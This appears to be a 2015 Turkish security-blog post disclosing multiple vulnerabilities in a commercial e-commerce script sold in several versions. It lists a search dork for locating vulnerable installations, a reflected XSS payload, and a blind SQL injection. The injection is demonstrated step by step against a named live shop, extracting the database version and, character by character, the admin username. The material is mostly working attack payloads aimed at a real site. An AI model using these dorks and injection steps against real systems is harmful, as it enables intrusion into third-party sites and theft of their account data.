09:58
1
09:41
0
Yorum
+] Script(s) : E-Ticaret Scripti v1-v2-v2a-v2c-v3 - Multiple Vulnerabilities |
[+] Demo(s) | |-----[-] v1 : http://eticaret.scriptevi.com [179,00 TL] |-----[-] v2 : http://eticaretv2.scriptevi.com [299,00 TL] |-----[-] v2a : http://eticaretv2a.scriptevi.com [229,00 TL] |-----[-] v2c : http://eticaretv2c.scriptevi.com [299,00 TL] |-----[-] v3 : http://eticaretv3.scriptevi.com [399,00 TL] |
[+] Dork : inurl:/urun/liste/yeniler/ + intitle:"En Yeni Ürünler" |
.png)
[+] XSS : site.com/arama/?aranan="><script>alert("XSS")</script>
|
|-----[-] Demo : http://www.hobierotikshop.com/sexshop/arama/?aranan="><script>alert("Inject!")</script>
|
[+] Blind SQLi : site.com/kategori/$id+and+1=2
|
|-----[-] Demo : http://www.hobierotikshop.com/sexshop/kategori/40+and+1=2
|
|-----[-] Exp. : http://www.hobierotikshop.com/sexshop/kategori/40+and+substring(version(),1,1)=4 <false>
http://www.hobierotikshop.com/sexshop/kategori/40+and+substring(version(),1,1)=5 <true> Mysql Version=5
/kategori/40+and+ascii(substring((SELECT+concat(kullanici_adi)+from+uyeler+limit+0,1),1,1))>97 ->>> a
/kategori/40+and+ascii(substring((SELECT+concat(kullanici_adi)+from+uyeler+limit+0,1),2,1))>100 ->>> d
/kategori/40+and+ascii(substring((SELECT+concat(kullanici_adi)+from+uyeler+limit+0,1),3,1))>109 ->>> m
/kategori/40+and+ascii(substring((SELECT+concat(kullanici_adi)+from+uyeler+limit+0,1),4,1))>105 ->>> i
/kategori/40+and+ascii(substring((SELECT+concat(kullanici_adi)+from+uyeler+limit+0,1),5,1))>110 ->>> n
09:36
0
Yorum
© 2015 Kaptan White Hat is designed by Templateify
